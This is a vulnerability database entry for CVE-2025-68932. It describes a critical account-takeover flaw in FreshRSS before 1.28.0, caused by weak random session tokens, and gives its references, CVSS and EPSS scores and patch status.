CVE-2025-68932
CRITICALFreshRSS < 1.28.0 - Account Takeover via Weak PRNG Session Tokens
Title source: llmDescription
FreshRSS is a free, self-hostable RSS aggregator. Prior to version 1.28.0, FreshRSS uses cryptographically weak random number generators (mt_rand() and uniqid()) to generate remember-me authentication tokens and challenge-response nonces. This allows attackers to predict valid session tokens, leading to account takeover through persistent session hijacking. The remember-me tokens provide permanent authentication and are the sole credential for "keep me logged in" functionality. This issue has been patched in version 1.28.0.
References (3)
Core 3
Core References
Exploit, Patch, Vendor Advisory x_refsource_confirm
https://github.com/FreshRSS/FreshRSS/security/advisories/GHSA-j9wc-gwc6-p786
Issue Tracking, Patch x_refsource_misc
https://github.com/FreshRSS/FreshRSS/pull/8061
Scores
CVSS v3
9.8
EPSS
0.0050
EPSS Percentile
38.7%
Attack Vector
NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CISA SSVC
Vulnrichment
Exploitation
poc
Automatable
no
Technical Impact
partial
Details
CWE
CWE-338
Status
published
Products (1)
freshrss/freshrss
< 1.28.0
Published
Dec 27, 2025
Tracked Since
Feb 18, 2026